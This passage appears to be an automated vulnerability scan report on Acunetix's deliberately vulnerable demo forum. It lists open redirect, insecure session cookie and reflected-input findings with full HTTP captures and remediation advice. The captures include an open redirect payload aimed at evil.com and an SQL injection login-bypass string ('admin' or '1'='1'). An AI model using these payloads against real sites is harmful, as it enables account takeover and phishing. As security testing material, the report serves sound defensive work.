	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

The application transmits sensitive information in cleartext, allowing an attacker positioned on the network path (shared Wi-Fi, a compromised hop, a malicious proxy) to read or modify it. Cleartext transmission of sensitive information exposes credentials, session tokens, and personal data to interception and man-in-the-middle manipulation.

Severity depends on what is exposed; for credentials or session tokens it can lead directly to account compromise.

Remediation

Encrypt data in transit:

  • Serve the application exclusively over HTTPS/TLS and redirect HTTP to HTTPS; never send sensitive data or set session cookies over plain HTTP.
  • Enable HSTS, set Secure on cookies, and avoid mixed content.
  • Use TLS for all back-end and third-party connections that carry sensitive data.

Medium CWE-601 - Open Redirect 4 findings

↩ Glossary32. Open Redirect ✓ PHASE 2 VERIFIED
Severity: Medium  |  Confidence: Certain  |  CWE: CWE-601 [ref]  |  OWASP: n/a  |  Discovered: 2026-07-19 14:12:00
URL
http://testasp.vulnweb.com/Login.asp?RetURL=%2F%5Cevil.com
Vulnerable Parameter
RetURL
Detail
Open Redirect: Location header echoes injected origin (evil.com)
Payload
/\evil.com
Detection Heuristic
Open Redirect: Location header echoes injected origin (evil.com)
AI Confidence
95%
HTTP Request
Full request
POST /Login.asp?RetURL=%2F%5Cevil.com HTTP/1.1
Host: testasp.vulnweb.com
Content-Length: 69
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://testasp.vulnweb.com
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

tfUName=admin%27+or+%271%27%3D%271&tfUPass=admin%27+or+%271%27%3D%271
HTTP Response
Full response
HTTP/1.1 302 Object moved
Cache-Control: private
Content-Type: text/html
Location: /%5Cevil.com
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 18:11:59 GMT
Content-Length: 133

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/%5Cevil.com">here</a>.</body>
Issue Background

An open redirection vulnerability arises when an application incorporates user-controllable input into the target of a redirect without validating that the destination is permitted. An attacker crafts a link to the trusted application that transparently forwards the victim to an attacker-controlled site.

Open redirects are most damaging when leveraged in phishing - the link bears the trusted domain, lending credibility to credential-harvesting pages - and as a building block in OAuth token theft and to bypass URL allow-lists in other controls. Severity is usually medium, higher where it enables token/credential theft.

Remediation

Remove user control over the redirect destination:

  • Avoid user-supplied redirect targets. Where a return location is needed, store it server-side or map a short, validated token to a fixed URL.
  • Allow-list destinations - validate the target against a list of permitted URLs/paths; for same-site navigation accept only relative paths and reject absolute URLs, protocol-relative (//host) and scheme-bearing values.
  • Show an interstitial for any off-site redirect so the user can see where they are being sent.
↩ Glossary33. Open redirect / unvalidated redirect via 'RetURL' parameter
Severity: Medium  |  Confidence: Tentative  |  CWE: CWE-601 [ref]  |  OWASP: A01:2021  |  Discovered: 2026-07-19 11:36:05
URL
http://testasp.vulnweb.com/showforum.asp?id=0
Detail
The login and register links embed a 'RetURL' parameter that carries a URL-encoded return destination (%2Fshowforum%2Easp%3Fid%3D0 = /showforum.asp?id=0), indicating the application redirects the user to a caller-supplied location after authentication. If the endpoint does not restrict RetURL to a server-side allow-list of relative paths, an attacker can substitute an absolute external URL to redirect victims after login. Only an internal value is observed in this capture, so the redirect target is attacker-influenceable but not yet confirmed to accept external hosts.
AI Confidence
60%
Evidence
<a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a>
HTTP Request
Full request
GET /showforum.asp?id=0 HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Default.asp
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 15:32:29 GMT
Content-Length: 3788


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum Acunetix Web Vulnerability Scanner</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" -->
<!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
	<div class="path">
			Acunetix Web Vulnerability Scanner
		</div>
	<table width="100%" border="0" cellspacing="0" cellpadding="5">
      <tr>
        <td class="tableheader">Thread</td>
        <td class="tableheader">Posts</td>
		<td class="tableheader">Posted by</td>
        <td class="tableheader">Last Post</td>
      </tr>   
	<tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=0'>1</a></div></td><td>1</td><td>admin</td><td>11/9/2005 12:16:25 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=1'>2</a></div></td><td>2</td><td>admin</td><td>7/19/2026 3:23:36 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=2'>3</a></div></td><td>2</td><td>admin</td><td>11/9/2005 1:08:52 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='threadtitle'><a href='showthread.asp?id=3'>aaa</a></div></td><td>1</td><td>admin</td><td>11/9/2005 1:45:54 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='threadtitle'><a href='showthread.asp?id=4'>Спилы Деревьев
</a></div></td><td>1</td><td>Charlesitaxy</td><td>7/19/2026 3:22:51 PM</td></tr>
	</table>
	
	<!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;left:10%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

An open redirection vulnerability arises when an application incorporates user-controllable input into the target of a redirect without validating that the destination is permitted. An attacker crafts a link to the trusted application that transparently forwards the victim to an attacker-controlled site.

Open redirects are most damaging when leveraged in phishing - the link bears the trusted domain, lending credibility to credential-harvesting pages - and as a building block in OAuth token theft and to bypass URL allow-lists in other controls. Severity is usually medium, higher where it enables token/credential theft.

Remediation

Remove user control over the redirect destination:

  • Avoid user-supplied redirect targets. Where a return location is needed, store it server-side or map a short, validated token to a fixed URL.
  • Allow-list destinations - validate the target against a list of permitted URLs/paths; for same-site navigation accept only relative paths and reject absolute URLs, protocol-relative (//host) and scheme-bearing values.
  • Show an interstitial for any off-site redirect so the user can see where they are being sent.
↩ Glossary34. Open redirect via 'RetURL' parameter on login
Severity: Medium  |  Confidence: Tentative  |  CWE: CWE-601 [ref]  |  OWASP: A01:2021  |  Discovered: 2026-07-19 14:11:05
URL
http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2
Detail
The login endpoint accepts a user-controlled return-destination parameter, RetURL, currently set to the URL-encoded internal path %2Fshowforum%2Easp%3Fid%3D2 (/showforum.asp?id=2). This value is echoed into the login and register links in the response and is designed to drive a post-authentication redirect; if the server redirects to it without validating that it points to an in-scope path, an attacker can substitute an external URL to send authenticated users to a phishing site.
AI Confidence
65%
Evidence
RetURL=%2Fshowforum%2Easp%3Fid%3D2  and  <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">login</a>
HTTP Request
Full request
GET /Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/showforum.asp?id=2
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 18:09:02 GMT
Content-Length: 3214


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum login</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" -->
<!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
		<form action="" method="POST">
		<table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm">
            <tr>
              <td>Username:</td>
              <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td>
            </tr>
            <tr>
              <td>Password:</td>
              <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td>
            </tr>
            <tr>
              <td>&nbsp;</td>
              <td align="right"><input type="submit" value="Login"></td>
            </tr>
          </table>
	  </form>
		  
    <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

An open redirection vulnerability arises when an application incorporates user-controllable input into the target of a redirect without validating that the destination is permitted. An attacker crafts a link to the trusted application that transparently forwards the victim to an attacker-controlled site.

Open redirects are most damaging when leveraged in phishing - the link bears the trusted domain, lending credibility to credential-harvesting pages - and as a building block in OAuth token theft and to bypass URL allow-lists in other controls. Severity is usually medium, higher where it enables token/credential theft.

Remediation

Remove user control over the redirect destination:

  • Avoid user-supplied redirect targets. Where a return location is needed, store it server-side or map a short, validated token to a fixed URL.
  • Allow-list destinations - validate the target against a list of permitted URLs/paths; for same-site navigation accept only relative paths and reject absolute URLs, protocol-relative (//host) and scheme-bearing values.
  • Show an interstitial for any off-site redirect so the user can see where they are being sent.
↩ Glossary35. Suspected open redirect in 'RetURL' parameter
Severity: Medium  |  Confidence: Tentative  |  CWE: CWE-601 [ref]  |  OWASP: A01:2021  |  Discovered: 2026-07-19 11:34:33
URL
http://testasp.vulnweb.com/Default.asp
Detail
The login and register links pass a return-URL parameter (RetURL=%2FDefault%2Easp%3F) that appears to control where the user is sent after authentication. If the destination is not validated against an allow-list, an attacker can craft a link with an external RetURL to redirect victims to a malicious site after login.
AI Confidence
60%
Evidence
<a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F">register</a>
HTTP Request
Full request
GET /Default.asp HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Templatize.asp?item=html/about.html
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ; ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Date: Sun, 19 Jul 2026 15:32:25 GMT
Content-Length: 3538


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum forums</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" -->
<!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FDefault%2Easp%3F" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FDefault%2Easp%3F" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
	<table width="100%" border="0" cellspacing="0" cellpadding="5">
      <tr>
        <td class="tableheader">Forum</td>
        <td class="tableheader">Threads</td>
        <td class="tableheader">Posts</td>
        <td class="tableheader">Last Post</td>
      </tr>   
	<tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=0'>Acunetix Web Vulnerability Scanner</a></div><div class='forumdescription'>Talk about Acunetix Web Vulnerablity Scanner</div></td><td>7</td><td>7</td><td>7/19/2026 3:23:36 PM</td></tr><tr bgcolor='#e9ffe9'><td><div class='forumtitle'><a href='showforum.asp?id=1'>Weather</a></div><div class='forumdescription'>What weather is in your town right now</div></td><td>1</td><td>1</td><td>11/9/2005 12:16:35 PM</td></tr><tr bgcolor='#FFFFFF'><td><div class='forumtitle'><a href='showforum.asp?id=2'>Miscellaneous</a></div><div class='forumdescription'>Anything crossing your mind can be posted here</div></td><td>0</td><td>0</td><td></td></tr>
	</table><!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

An open redirection vulnerability arises when an application incorporates user-controllable input into the target of a redirect without validating that the destination is permitted. An attacker crafts a link to the trusted application that transparently forwards the victim to an attacker-controlled site.

Open redirects are most damaging when leveraged in phishing - the link bears the trusted domain, lending credibility to credential-harvesting pages - and as a building block in OAuth token theft and to bypass URL allow-lists in other controls. Severity is usually medium, higher where it enables token/credential theft.

Remediation

Remove user control over the redirect destination:

  • Avoid user-supplied redirect targets. Where a return location is needed, store it server-side or map a short, validated token to a fixed URL.
  • Allow-list destinations - validate the target against a list of permitted URLs/paths; for same-site navigation accept only relative paths and reject absolute URLs, protocol-relative (//host) and scheme-bearing values.
  • Show an interstitial for any off-site redirect so the user can see where they are being sent.

Medium CWE-614 - Sensitive Cookie Without Secure Attribute 1 finding

↩ Glossary36. Session cookie transmitted over cleartext HTTP without Secure/HttpOnly flags
Severity: Medium  |  Confidence: Certain  |  CWE: CWE-614 [ref]  |  OWASP: A05:2021  |  Discovered: 2026-07-18 19:43:18
URL
http://testasp.vulnweb.com/Search.asp?tfSearch=test
Detail
The response sets the session cookie 'ASPSESSIONIDAACSSATB' with only 'path=/' and no Secure or HttpOnly attributes, and the entire exchange occurs over cleartext HTTP. The session identifier is therefore exposed to network eavesdroppers and accessible to client-side script.
AI Confidence
90%
Evidence
Set-Cookie: ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG; path=/
HTTP Request
Full request
GET /Search.asp?tfSearch=test HTTP/1.1
Host: testasp.vulnweb.com
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=admin
Accept-Encoding: gzip, deflate, br
Cookie: ASPSESSIONIDCSDDASDC=PHADEOCAMGLDLKEGHBONIKAP; ASPSESSIONIDCQDADSDD=MPMGBAPAKOKCPOEELPOFOMHJ; ASPSESSIONIDACBTRBSB=OAFBLDJDFBIHFLLJGAGJKHEM; ASPSESSIONIDCACTQATA=DDOIAMCBKAPIFBFNHODBPPBM; ASPSESSIONIDCCBSQBSA=GCBADAJDLLGJNJNEAOPBDOIH; ASPSESSIONIDACBRTATA=FLLKILFAHBNNLCLMIEAKBHCI; ASPSESSIONIDACDRSBTA=JNIPMOLCABJLIOBMPMGFKGKI; ASPSESSIONIDCCDQTASB=DBJODPOBBKMNHLMJBJKKJFLM; ASPSESSIONIDCAASTBSA=GGDPIOBBCCCMPNIEKAMMHDKJ
Connection: keep-alive

HTTP Response
Full response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/8.5
Set-Cookie: ASPSESSIONIDAACSSATB=MPMLJFOBDEFNOPANFGGELGCG; path=/
X-Powered-By: ASP.NET
Date: Sat, 18 Jul 2026 23:41:46 GMT
Content-Length: 2964


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" -->
<head>
<!-- InstanceBeginEditable name="doctitle" -->
<title>acuforum search</title>
<!-- InstanceEndEditable -->
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable -->
<link href="styles.css" rel="stylesheet" type="text/css">
</head>
<body> 
<table width="100%"  border="0" cellpadding="10" cellspacing="0"> 
  <tr bgcolor="#008F00"> 
    <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> 
    <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> 
  </tr> 
  <tr> 
    <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> 
     - <a href="./Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3Dtest" class="menu">login</a> - <a href="./Register.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3Dtest" class="menu">register</a> 
	- <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a>
    </div></td> 
  </tr> 
  <tr> 
    <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" -->
      <form name="frmSearch" method="get" action="">
        <div class="FramedForm">
          <input name="tfSearch" type="text" class="search">
          <input class="search" type="submit" value="search posts">
        </div>
      </form>      
        <div class='path'>You searched for 'test'</div><table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"></table>      
      <!-- InstanceEndEditable --></td> 
  </tr> 
  <tr align="right" bgcolor="#FFFFFF"> 
    <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> 
  </tr> 
</table> 
<div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px">
	<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p>
</div>
</body>
<!-- InstanceEnd --></html>
Issue Background

Session cookies lacking the Secure flag may be sent over unencrypted connections where they can be intercepted, and cookies lacking HttpOnly can be stolen via cross-site scripting, both leading to session hijacking.

Remediation

Set the Secure and HttpOnly attributes on all session cookies, add an appropriate SameSite value, and serve the entire application over HTTPS with HSTS enabled.

Medium CWE-79 - Cross-Site Scripting 1 finding

↩ Glossary37. Reflected SQL-injection payload / unencoded username in page body
Severity: Medium  |  Confidence: Tentative  |  CWE: CWE-79 [ref]  |  OWASP: A03:2021  |  Discovered: 2026-07-19 14:13:35
URL
http://testasp.vulnweb.com/showforum.asp?id=2
Detail
The response echoes the string "admin' or '1'='1" verbatim inside the navigation menu link text, indicating that the current user/identity value is reflected into HTML without context-aware encoding. A value containing HTML metacharacters (e.g. < > " ) placed in the same sink would be rendered in the page, enabling reflected/stored cross-site scripting. The same reflected string is also evidence that a SQL-injection authentication-bypass payload was accepted by the login flow.
AI Confidence
63%
Evidence
<a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout admin' or '1'='1</a>
HTTP Request
Full request
GET /showforum.asp?id=2 HTTP/1.1
Host: testasp.vulnweb.com
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36
